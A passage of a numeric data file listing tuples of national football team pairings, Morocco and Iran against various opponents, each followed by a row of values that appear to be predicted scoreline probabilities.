('MAR', 'DEN',0.00325552849777072,0.00258247348333511,0.00135205576440171,0.000480496141996003,0.000129009773728943,0.00885474785825815,0.00961523410778106,0.00522051719751752,0.0018896263647234,0.0294331353645384,0.0319609876629189,0.0173529717398029,0.0733766904988126,0.0796786163190721,0.121951866875531,0.101341841212285,0.132425651035969,0.0432608901775465,0.00628110810963794,0.000512979030117321,2.78125883830916e-05,0.110045542094225,0.0718994858446841,0.0597483783102208,0.0156587777700968,0.0260248475240687,0.0216266141136646,0.00170513960129666,0.00425090630787359,0.00706499511812332,0.00587100166459264,0.000116414376009059,0.000391253204163566,0.000993451357278806,0.00171226853233168,0.0019058585519478),
('MAR', 'ARG',0.000787672883651322,0.000879732195623476,0.000618617942038688,0.000295503159185364,0.000106678160566109,0.0028794596899681,0.00420612651253911,0.00307201734775463,0.00149580071779762,0.0123488303560309,0.018038364259902,0.0131746317583026,0.0397193295568549,0.0580194005463629,0.0851700171844249,0.0913148825537429,0.124410794358711,0.0423754740741632,0.00641488032455029,0.00054624198061558,3.09274346408596e-05,0.133386812059504,0.0908655784314909,0.0974213684222064,0.0206331076168814,0.0442434993214681,0.0474355891646489,0.00234260947477922,0.00753487375477018,0.0161570030092689,0.0173227020609509,0.000167071232631937,0.000724793758155338,0.00237629845923801,0.00529242995528112,0.0081875656899497),
('MAR', 'ICE',0.0116030336180924,0.00753444112902804,0.00352764708815121,0.00112521907154046,0.000271568524651579,0.0209784190411292,0.0205238213877107,0.0100395373819356,0.00327399428333342,0.0521816676812441,0.0510509026015282,0.0249723204742215,0.0973474134296312,0.0952379167309187,0.121070857800452,0.0752878381259363,0.118447279362747,0.0465870661771714,0.00814372528970144,0.000800761889680322,5.26669414575569e-05,0.0736563674952895,0.0579402766418008,0.0360301252343449,0.0151925116206828,0.0188949079308514,0.0117497868235728,0.00199181314555601,0.00371582332208039,0.00462136487441856,0.00287379289208945,0.000165215241845058,0.000416464933533981,0.000794323047085599,0.0010321284611589,0.000859450934496899),
('MAR', 'CRO',0.00209363286761429,0.00179337949130852,0.000991996410421382,0.000372213276231303,0.000105484970609708,0.00641650567493848,0.00735132374234671,0.00421116753436897,0.00160823026564757,0.0233841061496801,0.0267909269375574,0.0153470430209999,0.0639152111898603,0.0732269919673419,0.116465266202484,0.106110564129429,0.133433042837799,0.0419477011243595,0.00586098246463274,0.000460633167566273,2.400018395645e-05,0.121569768487107,0.0764364239291725,0.0696406089782993,0.0160196814712199,0.029190805010132,0.0265955068666749,0.00167871664611851,0.00458839556568068,0.00836090034048221,0.00761754882538177,0.000110108222597425,0.000405555402915857,0.00112822988298998,0.00212906471677233,0.00261764238164509),
('MAR', 'NGA',0.00600710111580874,0.00370791289324898,0.00153672775771332,0.000431335993308861,9.13833388640403e-05,0.0147634659162164,0.0126321351555834,0.00540424719691507,0.00154135398361141,0.0442788719022258,0.0378865435514909,0.0162085224918169,0.0996015353742319,0.0852225394559229,0.149363423573064,0.111993415651895,0.127800542540836,0.0364596851043891,0.00462285861488318,0.000329709025544427,1.5538176770597e-05,0.0958254634161633,0.0546752956079056,0.0409958004471628,0.0103987250821811,0.0155940284779133,0.0116924777916604,0.000988869672605369,0.00222437775501588,0.0033356983460206,0.00250112271410598,5.86278125238564e-05,0.000177537065477242,0.000405795233866107,0.000628168562305198,0.00059766752192703),
('MAR', 'BRA',0.000188837206885358,0.000268610168736764,0.000231012472643211,0.000134831537367316,5.94492623092515e-05,0.000933467415681405,0.00166435786340794,0.00148376207404398,0.000881841556143623,0.00515682312071999,0.00919453530674016,0.00819685662352989,0.0213661646767126,0.0380955388406322,0.0590173423062405,0.0815084678414046,0.10522700213711,0.0339618762074759,0.00487162256457938,0.000393077439981167,2.10459290348489e-05,0.145328328667099,0.0938090529501226,0.129559073262592,0.0201844987739388,0.0557533601114565,0.0770006032483502,0.0021715067892848,0.00899716173510728,0.0248518431800805,0.0343227190769149,0.00014639191793938,0.000817584685515385,0.00344942987862975,0.00987654331353895,0.0208574721775767),
('MAR', 'SWI',0.00231417627080549,0.00196974876172674,0.00108939062880159,0.000408868190014083,0.000115924511818905,0.00686127116470721,0.00786645374507414,0.00450944825221986,0.00172336219923599,0.0244248308314792,0.0280030911699568,0.0160527849810582,0.0652108421485008,0.0747642909199032,0.116069147365012,0.103296066468225,0.133073384954321,0.0428586643922404,0.0061348442828234,0.000493959089389732,2.63894604437662e-05,0.118429035876047,0.0762843795496808,0.067889499658946,0.016379166140108,0.0291533706021296,0.0259451247455113,0.001758401163049,0.00469468228740171,0.00835609159911563,0.0074365273876132,0.000118281459636644,0.000425663216912668,0.00115719842466301,0.00213489457881281,0.00257004052579271),
('MAR', 'CRC',0.00599783227631658,0.00328102014284664,0.00118946440952598,0.000291364938732728,5.38199144697469e-05,0.0155558588250816,0.0115880964584056,0.00431618662265048,0.00107175882472246,0.0476833010036464,0.0355209376543404,0.0132303865848869,0.109622548978379,0.0816616225347549,0.168012742288936,0.128752167480688,0.125158494029674,0.0304162813999338,0.0032852572922657,0.000199597540397551,7.97484755971391e-06,0.0959119359960623,0.0466174422676738,0.0357240567149775,0.00755271281240435,0.0115756475575396,0.00887069452424443,0.000611825403237673,0.00140656915148365,0.00215577490728116,0.00165202167485368,3.0723694653223e-05,9.49506984926692e-05,0.000221280305731327,0.000348442117697461,0.000327988463963412),
('MAR', 'SRB',0.00547314618559864,0.00415628293187933,0.00216228853757944,0.000765366462329954,0.000204870539131142,0.0124280166177262,0.0134739830814632,0.00730399007596328,0.00263956944318683,0.0364910545837672,0.0395622139243959,0.0214459240552604,0.0803585824830773,0.0871217197507618,0.117974151059698,0.0865987172010369,0.127903088990171,0.04722702801489,0.00775028514940924,0.000715430207285033,4.40541093602858e-05,0.093887036550863,0.0693338329891837,0.0508943776374873,0.0170672493724865,0.0250563685100752,0.0183925830463571,0.00210064111981293,0.00462591571055671,0.00679129051264156,0.00498513480496867,0.000163041544463984,0.000484737890605418,0.00108985810224589,0.00166717114567229,0.0016589955106703),
('MAR', 'GER',0.00049552292084172,0.000669209171731896,0.000571143799369059,0.000332189264426873,0.000146208819670126,0.00183232640294253,0.00326980133760329,0.00291749351267947,0.00173543028412562,0.00819149121093223,0.0146177825498004,0.0130427758005817,0.0274653010038319,0.0490120525555858,0.0613923838616307,0.0686142998339609,0.109555207274777,0.0437312027888636,0.00775831309136385,0.000774222356786231,5.17138604074224e-05,0.122442774942012,0.0977510782776478,0.109250062827864,0.026012895436169,0.058145864185029,0.0649858746043874,0.00346119316991612,0.0116050557580144,0.0259404416406085,0.0289919551676911,0.00029160316761368,0.00132136538406459,0.0045310772325967,0.0105885514030152,0.0184860638292222),
('MAR', 'MEX',0.00297622298706554,0.00244217827297126,0.0013198001542856,0.000484302800107618,0.000134283122956251,0.00820739396196953,0.00920553585041155,0.00516253336234861,0.00193012488358085,0.0276749852550548,0.0310406774800271,0.0174078441151667,0.0699891596909259,0.0785008885476222,0.118000242917256,0.0994729568837552,0.132350837740389,0.0440238854844057,0.00650829946034369,0.000541214236026242,2.98979489005622e-05,0.111570356556895,0.0742233397895024,0.0625694905037333,0.0164592828523066,0.0277500027631824,0.0233929588629894,0.00182495150973083,0.00461524446953114,0.00778120455985136,0.00655947315488604,0.000126965975132001,0.000432961041196696,0.00111559339352967,0.00195182574337601,0.00222224917067239),
('MAR', 'SWE',0.00260674375780873,0.00232101638534473,0.00136379315730884,0.000544892316457747,0.000164596908468868,0.00717473277182597,0.00877486624957639,0.00536593348816521,0.00218755411805112,0.0244781320556163,0.0299373289094413,0.0183070272722553,0.0626342786540851,0.0766031900151758,0.106845104400507,0.0911312190358452,0.130674065550997,0.046843747917247,0.00746330773331852,0.000668857482573645,3.99370647416109e-05,0.111455615648926,0.0799087216182515,0.0681564144050078,0.0190970003424998,0.0325767461392776,0.0277856304652509,0.00228195004685283,0.00583901969253771,0.00996053091137687,0.0084956192358186,0.000171699488434592,0.000592932613333076,0.00154806962450905,0.0027483213768485,0.00325025254180667),
('MAR', 'KOR',0.0102994941802182,0.0061725303744848,0.00260130906275198,0.000744467086205318,0.000160995594269219,0.020608011417824,0.0180290648934662,0.00788642762133956,0.00229983237230706,0.0538822887412145,0.0471393023144208,0.0206200764166006,0.105661615565216,0.0924388134862028,0.138132922272744,0.090291560059627,0.12084656637105,0.0404353756708503,0.00601320668106104,0.000503006164007607,2.79581055158233e-05,0.0789922114580819,0.0528617376777029,0.0345534481125239,0.0117917250267521,0.0154154886603695,0.0100764430182543,0.00131517412418682,0.00257901855985666,0.0033715873864219,0.0022038619033651,9.20663793764033e-05,0.000243455532049858,0.000486466762196747,0.000660102727229922,0.000557497325093004),
('MAR', 'BEL',0.00170815184907794,0.00196843684870277,0.00151792330289241,0.000800591336937454,0.000320018441751478,0.00451461605082303,0.00733354507894458,0.00595630755965481,0.00322514321639259,0.0157417664768844,0.0255709351096214,0.0207687213293574,0.0411668249896224,0.066871415734984,0.0717711692739926,0.062563735972529,0.116585131340999,0.0543129843451412,0.0112455745506209,0.00130973115416734,0.000102876625874291,0.101628571044947,0.0946904793894962,0.0825427565352954,0.0294086816821327,0.0512717575782293,0.0446941680959102,0.0045668295474748,0.0119428701355974,0.0208214686057365,0.0181503085094873,0.000453148768122671,0.00160524927112435,0.0043097017959067,0.0079137928194104,0.0106361009149528),
('MAR', 'TUN',0.00981707548515098,0.0057511187260462,0.00235055793865079,0.00065181945006409,0.000136533507688345,0.0202946562256475,0.0171878056840894,0.00727828697735408,0.00205469165362041,0.0539955617829377,0.0457295365543335,0.0193644666748788,0.107744644446251,0.0912503267684388,0.143331637187971,0.0953363312142747,0.121389409161605,0.0386405383680144,0.00546667205861517,0.000435036204734004,2.29612715715382e-05,0.0807415665151362,0.0514031268521655,0.034190536180094,0.0109083898344747,0.0145113233432204,0.00965213511649477,0.00115744873967582,0.00230961395350348,0.00307245664904465,0.00204362937926034,7.69120447435213e-05,0.000206841431468297,0.000420180882906863,0.000579125611268507,0.00049284252475329),
('MAR', 'PAN',0.0211067693205473,0.00925583871222721,0.00296973023130997,0.000645584181918203,0.000105948919200441,0.0357920795650457,0.0237291215356495,0.00786586328171216,0.00173828053639026,0.080992045361619,0.0536954016408587,0.0177992551274636,0.137454532362477,0.0911284100754072,0.155519375453306,0.0879791874654428,0.103104882592063,0.0302077602685823,0.00393346510639831,0.000288107526946694,1.39559640221947e-05,0.058327676327977,0.0341777890482683,0.0193347877141828,0.00667562603648379,0.00755296441747014,0.00427280311837376,0.000651943619232418,0.00110643711870942,0.00125184966055741,0.000708186460006713,3.97362338191601e-05,9.0809905606505e-05,0.000156670603099539,0.000183137155808256,0.000127334583205057),
('MAR', 'ENG',0.000480811685947176,0.000521019239188269,0.000344432491142172,0.000154159458677516,5.20730696063121e-05,0.00212080033161825,0.00289264838556084,0.00197270213460008,0.000896883684234621,0.0103458954338433,0.0141112000397759,0.00962342833618795,0.0378527686219095,0.0516289762929384,0.0923285375349123,0.112601523662415,0.125930758808289,0.0352094614225121,0.00437526563678498,0.00030582430398546,1.41159411992414e-05,0.153581933564317,0.0858811177856842,0.104738415388013,0.0160078863030892,0.039045617670722,0.0476190369678597,0.00149190200651619,0.00545845662372421,0.0133139882659603,0.0162373996685884,8.66198353216909e-05,0.000426558426418805,0.00158531889612751,0.00398905898664608,0.00677159595183816),
('MAR', 'POL',0.00589290845287556,0.00520546084320198,0.00326343299121995,0.00140040366164813,0.000455588399941324,0.0115350515951457,0.0152573238414501,0.0100903723265895,0.00444881923580845,0.0317942946546512,0.0420540684933425,0.0278122961376031,0.0657264402492259,0.0869358559479845,0.0905815544320853,0.0624179399661726,0.11981152391324,0.0574946933133027,0.0122623699150248,0.00147110472876789,0.000119217396492555,0.0825597281230066,0.0792368896317386,0.0546005580401945,0.0253492625733051,0.0349353410726378,0.0240732457666599,0.00405483554438372,0.00838231855819409,0.0115521765954011,0.0079603741592997,0.000415241874253243,0.0011633495001035,0.00247092836290272,0.00359230434659775,0.00361828394625946),
('MAR', 'SEN',0.00652706704826443,0.00402355977233794,0.00167690850513661,0.000473534580746968,0.000100949784927981,0.0155375506665517,0.0133811298682908,0.00576199686793375,0.00165410087353702,0.0456150769179907,0.0392842656665122,0.0169160465489476,0.100437415469551,0.0864979383736951,0.147431874251277,0.108207471506641,0.126970144678517,0.0372465445666897,0.00485610249618914,0.000356133007689887,1.72735090465654e-05,0.0931896062657275,0.0546741256650069,0.0401280179411102,0.010692394202236,0.0156953433150323,0.011519580980526,0.00104553380950711,0.00230210537190857,0.0033792557098137,0.00248020123050259,6.38089338402815e-05,0.000189192484325835,0.000423484615768237,0.000642265831501744,0.00060019781526926),
('MAR', 'COL',0.000765489291251667,0.000767490724388996,0.000476513446644596,0.000200386957653741,6.36081967897911e-05,0.00303580350657679,0.00389206275293493,0.0024949164924486,0.00106620554008251,0.0135610454085907,0.0173859868108365,0.0111448833139035,0.0454332647457552,0.0582478797056864,0.101476028495082,0.113324283614208,0.130097705587943,0.0373384513439032,0.00476277918271923,0.000341733157345163,1.62049202210695e-05,0.145287803476861,0.0833961145812256,0.0931333742686215,0.0159566317355574,0.0356394290778815,0.0398006586241796,0.00152653452515591,0.00511431420921343,0.0114229144071235,0.0127566442160911,9.1070722137697e-05,0.000410772010995752,0.00139853148841448,0.0032250460508956,0.00494635995741178),
('MAR', 'JPN',0.0118318724116783,0.00830409926167381,0.0042710199261702,0.00150078628289356,0.000399491295521872,0.0200630776389848,0.0216873835321887,0.0117215965799364,0.00422352550977709,0.0486990684181961,0.052641742879641,0.0284518080470181,0.0886553638781665,0.0958328982825403,0.107596494137909,0.0652921890133951,0.116307501624452,0.0517957627800876,0.01025175506309,0.00114136548784687,8.55009544873362e-05,0.070578241796671,0.0628618759491519,0.0381461265917077,0.0186630484941368,0.0226503902308098,0.0137448117805925,0.00277043417679936,0.00504350202216361,0.00612104120973445,0.00371439778616311,0.000262047508860923,0.000645749800463628,0.00120545149841994,0.00153738765650317,0.00129177425173866),
('IRN', 'FRA',0.000206439800910152,0.000207143884951418,0.000121287220040993,4.7863772345669e-05,1.42289366692503e-05,0.00122885141332756,0.00147096683232224,0.000880392616359129,0.000351284222008832,0.0074576997291673,0.00892705890073263,0.00534295986103263,0.0339446767000606,0.040632653401507,0.103002366066057,0.156276159424831,0.123296488485624,0.0243191669939229,0.00213188691401024,0.000105124068233337,3.39146240600982e-06,0.187066593001796,0.0737945381911724,0.111961768020451,0.00970355668439439,0.0294446550951225,0.0446737078923363,0.000637980903704055,0.00290385189850821,0.00881150287259102,0.0133688951068005,2.58417238983419e-05,0.000157871958048135,0.000726544381774118,0.00225355550711525,0.00450048016862868),
('IRN', 'AUS',0.00558952960657888,0.0030056683344777,0.00106351841246116,0.000254114583031802,4.57748327869505e-05,0.0149812368470524,0.0108791512235169,0.0039501388487639,0.000956177346555265,0.0468879629721571,0.0340493408484576,0.0123630622736041,0.110061727252059,0.0799251882151649,0.1722344504907,0.134763948724412,0.125074094476808,0.0290202410534585,0.00299262393871837,0.00017359043942561,6.6136862177627e-06,0.0978635737902793,0.0454134729278163,0.0355335353618594,0.00702468904240502,0.010992862707995,0.00860130817089189,0.000543299740816121,0.00127530615747429,0.00199571332127973,0.00156153549380697,2.60092490986598e-05,8.20411395275077e-05,0.000195095905881605,0.000313289071844696,0.000299099158747381),
('IRN', 'PER',0.000774021897173146,0.00053654319124614,0.000222566311108518,6.21464954310971e-05,1.30654789956536e-05,0.00362722799872707,0.00306821783429307,0.00129767975461947,0.000365895955784215,0.0175913248314574,0.0148802381862021,0.00629348530027014,0.0639857853092877,0.0541246173927034,0.15515908213746,0.188122570140939,0.13124674355562,0.0228916015779626,0.00177452164985922,7.73764771215661e-05,2.20176697836601e-06,0.159130064319651,0.0555098272581105,0.0673028689524203,0.00645455429891961,0.0156516438109793,0.0189768295873482,0.000375260321059769,0.00136495270074752,0.00330987276604217,0.00401305397666452,1.33998634453345e-05,6.53682285469144e-05,0.000240095785749933,0.000593614955563373,0.000881636904232375),
('IRN', 'DEN',0.00105764529627947,0.000731232525173592,0.000306917531838775,8.67895744754096e-05,1.84849461827821e-05,0.00450999911485513,0.00386688348829728,0.00165773734442811,0.000473782588558869,0.0203340404529945,0.017434452485603,0.00747416958708729,0.0687594150155337,0.0589544786633706,0.155006319385388,0.174717593539567,0.13290277043266,0.025273851978559,0.0021361233287049,0.000101555566979301,3.15633594038163e-06,0.149803261678664,0.0569755686694324,0.0642208284664941,0.0072232860371414,0.0162836606773372,0.0183543614146832,0.000457879248885448,0.00154831546508893,0.00349041191576006,0.00393426779502589,1.78644666947454e-05,8.10608754278395e-05,0.000277036692087521,0.000637885840152394,0.00088684709955431),
('IRN', 'ARG',0.000260533530405618,0.000250539168029406,0.000141330952248731,5.37369062440979e-05,1.53918829222998e-05,0.0014780159700482,0.00170471358146406,0.000983090999596318,0.000377959059709905,0.00859767146537626,0.0099163795337847,0.00571867530959213,0.0375097205262951,0.0432629493279502,0.109097689192306,0.158656284559055,0.125831057472541,0.0249493032511493,0.00219860129294971,0.000108982574508963,3.53480085303172e-06,0.182990934166718,0.0725654921835623,0.105529012230032,0.00959200643795311,0.0278985213010268,0.0405716726640323,0.000633955512029006,0.00276580632070845,0.00804439686857271,0.0116986356735432,2.58169999327082e-05,0.000151182215081079,0.000666928616082049,0.00198304112277831,0.00376602856065396),
('IRN', 'ICE',0.003943752930533,0.00229770993234724,0.000865140535735857,0.000219930498735379,4.21470274141609e-05,0.0116179587228126,0.00897462406963511,0.00346635235642217,0.00089256096341887,0.0391978210146306,0.0302794764853484,0.0116951232555064,0.0991871211384618,0.0766199248943064,0.167323671657902,0.141133298233338,0.129253949588589,0.0295936247741982,0.00301141067234479,0.00017237105280351,6.47818015172837e-06,0.109022447537606,0.049922952678228,0.042108751853297,0.00762014692204529,0.0128548035968236,0.0108427027197369,0.000581562547870691,0.00147160003776007,0.00248251505541922,0.00209393885643129,2.74615781472984e-05,9.33689645381671e-05,0.000239310793226912,0.000414123016180352,0.000429338318220596),
('IRN', 'CRO',0.00067570563398127,0.000501010234035993,0.000222045839702213,6.62745541070748e-05,1.48965609863817e-05,0.003218787020242,0.00291179082957687,0.00131703740910613,0.000397141058202788,0.0159111412169952,0.0143935944790363,0.00651039291278663,0.0589890881025413,0.0533629235801901,0.145797734543918,0.180177216514922,0.131892077278895,0.0241366810762966,0.00196315177748429,8.98157973835427e-05,2.68413622278985e-06,0.162992569389506,0.0596563454958969,0.0737234656802258,0.00727820409493865,0.0179888467973216,0.0222306632842669,0.000443978376543574,0.00164600886965782,0.00406828401581896,0.00502759588312812,1.66534051975029e-05,8.28287056530156e-05,0.000310237099198119,0.000782554724560507,0.00120051312030965),
('IRN', 'NGA',0.00193099785034712,0.0010412066864333,0.000345281526942219,7.70392885118875e-05,1.29396189291476e-05,0.00741341140267385,0.00500849801503127,0.00169186970775185,0.000381008850613201,0.030158741967193,0.0203752349726667,0.00688275062406424,0.0920173251867228,0.0621668710278189,0.187169348635956,0.190357440828235,0.126451543048018,0.0209999575924813,0.00154999459610671,6.43523598095907e-05,1.74191611200293e-06,0.128605416959697,0.0427153079704446,0.0434428861814274,0.00472918787337895,0.00961948211427818,0.00978333263812621,0.000261793944657841,0.000798759396651902,0.00162472964395359,0.00165240398235462,8.89090601538233e-06,3.63715097730636e-05,0.000112007458253746,0.000232078591307652,0.000279696626966193),
('IRN', 'BRA',6.42164057836668e-05,7.76947867318419e-05,5.35590260964796e-05,2.48712914415885e-05,8.6985425078508e-06,0.000485406879334999,0.000683367692455927,0.000481030886637113,0.000225735687588919,0.0036372729885714,0.00512064199097783,0.00360448260030988,0.0204412350081168,0.0287776712550576,0.0765855976844847,0.14346867423521,0.107819080019434,0.0202569551823882,0.00169149295977966,7.94490573268792e-05,2.43892158318669e-06,0.201978713169748,0.0758951706829356,0.142175289453171,0.00950607920111363,0.0356156933259782,0.0667192847994327,0.000595331303459097,0.00334572277635823,0.0125351613252449,0.0234822607778865,2.29406112285782e-05,0.000172987740632009,0.000982444795026178,0.00375859782955457,0.00962238807348337),
('IRN', 'SWI',0.000749661377008818,0.000553552010985156,0.000245383442178555,7.32735884769532e-05,1.64789030375657e-05,0.00346615034505221,0.00313778203854097,0.00142026097273083,0.000428570501049474,0.0167363702601453,0.0151508378935779,0.00685775605192312,0.0606089021537645,0.0548670731566043,0.146325595621421,0.176633952877447,0.132463332519636,0.0248346002797972,0.00206936049337235,9.69923897243187e-05,2.97105293090392e-06,0.159900405222323,0.0599571605626837,0.0723760612661004,0.00749395870873747,0.018092358261768,0.021839820593788,0.000468329525624791,0.00169600325238416,0.00409459134322177,0.00494270227501578,1.80076716047919e-05,8.74995840601216e-05,0.000320208639661112,0.000789360677312072,0.0011846098255398),
('IRN', 'CRC',0.00189268384087054,0.000898720667644564,0.000260183885237368,5.06114381294387e-05,7.40709863434759e-06,0.00757403518696127,0.00445498650921859,0.00131019359610886,0.000256881774424014,0.0314910061023119,0.0185227562170602,0.00544746802883912,0.0981989891309551,0.0577598546875546,0.204143820937571,0.212195155957333,0.12007575166575,0.0169869407162551,0.00106805227679498,3.77739478122973e-05,8.68608300557074e-07,0.124811482093302,0.0353137951270739,0.0367065543792595,0.00333052724893991,0.00692376331317002,0.00719683323895003,0.000157054937256334,0.000489747327427094,0.00101812545729571,0.0010582798401773,4.52862572238674e-06,1.89184381871111e-05,5.9461422967302e-05,0.00012557348111562,0.000151133677555869),
('IRN', 'SRB',0.00181808315274124,0.00121917654109289,0.000509500718449249,0.000143646610870098,3.05205286033588e-05,0.00659752893958431,0.00564776272382458,0.00241736141491121,0.000689787737912653,0.0262756090224575,0.0224930283052573,0.00962748992627892,0.0784847973942212,0.0671862931059663,0.156288503576255,0.155610367619447,0.133789543440171,0.0287571487166327,0.00274717899320351,0.000147621841041133,5.20025363754226e-06,0.133209030491517,0.0572647428452594,0.057016271074834,0.00820577694328442,0.0163403441395759,0.0162694433717388,0.000587925238963266,0.00175612269247662,0.00349700574908644,0.00348183223801329,2.60134938419087e-05,0.000104353892425971,0.000315474822280448,0.000643417895317972,0.000795951814439661),
('IRN', 'GER',0.000171447191655497,0.000200312441926005,0.00013752052024177,6.37552372018315e-05,2.22833333791062e-05,0.000996840679534963,0.00140457601004389,0.000989543167977039,0.000464764538331836,0.00604467256401597,0.00851711035302865,0.00600042169343518,0.0274904007904349,0.038734732891067,0.0833485605288826,0.126352878504667,0.117440420514514,0.0272891534681509,0.00281825321865134,0.000163716513145451,6.24691748018429e-06,0.17803469058911,0.082738395738979,0.125427894592799,0.0128170566212085,0.0388602271657901,0.0589104542488329,0.000992749127923161,0.00451489656750418,0.0136887829576207,0.020751613692496,4.75977789930567e-05,0.000290890090415584,0.00134025395588939,0.00416998071807042,0.00875452431945776),
('IRN', 'MEX',0.000969227493196521,0.000693011682498942,0.000300330442148767,8.77042662378673e-05,1.92921474238891e-05,0.00419292754802567,0.00371331778496952,0.00164428419215873,0.000485400686779677,0.0191772519310891,0.0169836539856467,0.00752048582718372,0.0657834509568911,0.058258783534172,0.150437349256222,0.172014357122046,0.133229510435934,0.0257974141635235,0.00222008397504524,0.000107469481788692,3.40229355129367e-06,0.152338423274725,0.0589949987112807,0.067456564655716,0.00761552206840486,0.0174156104082143,0.0199135058086853,0.000491534686340045,0.00168610435158553,0.00385587964043008,0.00440892278923968,1.95359419364222e-05,8.99349064240154e-05,0.000311860741348401,0.00072871161382639,0.00103411186825481),
('IRN', 'SWE',0.00085902476939105,0.000667927448643405,0.000315102035350478,0.000100252608352618,2.40339519326849e-05,0.00373084473832231,0.00360282292641625,0.00173959705502882,0.000559967924351128,0.017265001367702,0.016672562680841,0.00805022659501739,0.059922140922593,0.0578659467917028,0.138649008139832,0.160404377765742,0.133891346407433,0.0279401548955478,0.00259132921841688,0.000135188236003703,4.62018940533852e-06,0.154900192917656,0.0646484705635805,0.0747924405185764,0.00899380146550644,0.0208100317078103,0.024075326842657,0.000625602308111787,0.00217129607289244,0.00502398683106703,0.00581229892916249,2.68509947593129e-05,0.000125131330950463,0.000439396692087199,0.00104056702082276,0.00152301876273941),
('IRN', 'KOR',0.0034198348862605,0.00181955196145281,0.000614980141020478,0.000140070842848829,2.40316754889609e-05,0.010939770474239,0.00755694553593171,0.00261008336360964,0.000600995480038825,0.0387976174554859,0.0268005149400007,0.00925659419516287,0.103196071876015,0.071285507911297,0.18299112074529,0.162243337672043,0.126406119423402,0.0246212067271171,0.00213141516834653,0.000103788514591995,3.30565355353915e-06,0.112074021044824,0.0436592413954452,0.0387090970063298,0.00566925722082491,0.0100529381959276,0.00891312233989932,0.000368083324498952,0.000979048604078271,0.0017360854736762,0.00153924573272185,1.47183453138204e-05,5.25409130892887e-05,0.000141281696996293,0.000256014291956773,0.000272105328926268),
('IRN', 'BEL',0.000592962112089951,0.000602957626040962,0.000375182109778126,0.000157983904110523,5.01970750380639e-05,0.00253756703501632,0.00325470502793313,0.00208725615376405,0.000892377489211374,0.0120015424584508,0.0153932802733708,0.00987177599858004,0.0425713939950372,0.0546024314509898,0.100671703544492,0.11903288738597,0.129122381862415,0.0350167711293129,0.00422054124204335,0.000286142736415624,1.27984165889039e-05,0.152672592179235,0.0828067317369608,0.0979095816064117,0.0149709360033814,0.035402872438043,0.041859886936303,0.0013533255093879,0.00480046241248925,0.0113520062068659,0.0134224616138487,7.61258357219493e-05,0.000363345817471047,0.00130858852103442,0.0031893445487875,0.00515583478154732),
('IRN', 'TUN',0.00323603131563015,0.0016776155344895,0.000549476527265164,0.00012121852225976,2.01393854479549e-05,0.0106361661096339,0.00711254150375496,0.00237812413425998,0.000530094096928554,0.0383838359080353,0.0256677662942797,0.00858218324135551,0.103889797589789,0.0694724480191018,0.187458944421408,0.16912563436856,0.125356214702184,0.0232285611568137,0.00191300555318463,8.86201904529494e-05,2.68234116122503e-06,0.113096493736188,0.0419136590493503,0.0378145422578159,0.00517774617900781,0.00934273485671113,0.00842902409514515,0.00031981287368235,0.00086560641810457,0.00156190183431667,0.00140914929061159,1.21503611747917e-05,4.4121973848876e-05,0.000120664096708093,0.000222261547626979,0.000238745000311444),
('IRN', 'PAN',0.0071127156480864,0.00279426449254842,0.000717618411483369,0.000124030785175419,1.6139098965472e-05,0.01934354497386,0.0101258563602106,0.00265031479923088,0.000462457579563248,0.059371551750354,0.0310795051123936,0.00813466727375491,0.136672769727904,0.0715447368353156,0.209746311540363,0.160944697661325,0.10979688705518,0.0187259297482046,0.00141943083103365,6.05212104306143e-05,1.68324564138557e-06,0.0842504769760875,0.0287379461371079,0.0220514964886723,0.00326751680552788,0.00501452922348799,0.00384780015372449,0.00018575903134255,0.000427615593109499,0.000656244792510046,0.000503556505698186,6.48272084414528e-06,2.00117728588374e-05,4.65080017721579e-05,7.27410650822098e-05,6.44820107912419e-05),
('IRN', 'ENG',0.000154540737491192,0.000142376993275911,7.52911394216862e-05,2.67837286528475e-05,7.17193401921021e-06,0.00103551632217829,0.00111520261448654,0.000600510510902154,0.00021557390499842,0.00685191786945315,0.00737919486019027,0.00397352375073085,0.034003890728857,0.0366205988561972,0.112500335111025,0.186101136205455,0.121157595645146,0.0197193355207501,0.00142643303655444,5.80407515845795e-05,1.53915326917618e-06,0.20042221374035,0.0652405300305379,0.107922671993351,0.00707893381548952,0.0234203324796446,0.0387425555707902,0.000384050405021426,0.00190592010230328,0.00630565048904819,0.0104309797776892,1.27769832108613e-05,8.5007083019095e-05,0.000425716012452086,0.00143419423321606,0.00302173868563858),
('IRN', 'POL',0.00203999413740985,0.00161761144499714,0.000818842658321727,0.000280631569560115,7.25850388074597e-05,0.0065908406774767,0.00688336188551459,0.00359443302952778,0.00125132157015204,0.0246409452969475,0.0257345840963333,0.0134383809271573,0.0690931796305704,0.0721597414489712,0.129158125873622,0.120719740851277,0.13489054952901,0.0376812032231219,0.00467827214582458,0.000326714740349498,1.50664224838444e-05,0.126077643758643,0.0704386976396752,0.065836673205396,0.0131178692147088,0.024521659189606,0.0229195671785227,0.00122147696153088,0.00342501986431954,0.00640250092875611,0.00598420151803511,7.08538514559164e-05,0.000267404815280378,0.000761639583623031,0.00146872202476739,0.00179957318046553),
('IRN', 'SEN',0.00210894407405304,0.00113845954263568,0.000379794615329142,8.52697512737155e-05,1.44130915102603e-05,0.00787063594809344,0.00535206056080993,0.00181971015020177,0.000412469800883099,0.0313417019517696,0.0213124692885025,0.00724627762513257,0.093604470564241,0.063651374364955,0.186371434095379,0.185537673774512,0.126733240955591,0.0216415809743141,0.00164249822360483,7.0120234514414e-05,1.95271454515167e-06,0.126166280958977,0.0430895282881395,0.0428967608766213,0.00490545079076525,0.00976701105458192,0.00972331687843147,0.000279226164878241,0.000833931015339628,0.0016604006019007,0.00165297255293317,9.75710769087249e-06,3.90771520670819e-05,0.000117825872993433,0.000239096610364438,0.000282692563834933),
('IRN', 'COL',0.000245293673692876,0.000210055132401842,0.000104361205399561,3.48876210571231e-05,8.77978037481411e-06,0.00148614836370591,0.00150442073188798,0.000761458880488405,0.000256940368867429,0.00900468608569685,0.00911539975570454,0.0046137373316256,0.040920058933289,0.0414231758502276,0.123968876291614,0.187784214999053,0.125493088144237,0.0209662393242912,0.0015568212574853,6.50248701985579e-05,1.77091354691437e-06,0.19009304391482,0.0635180201800483,0.0962151300762521,0.007074673897415,0.0214329938923588,0.032466035456259,0.000393990639293311,0.00179041446038358,0.00542412876559776,0.00821630229111357,1.34628563739343e-05,8.20310890444824e-05,0.000376270151176279,0.00116130832409607,0.00221662758912076),
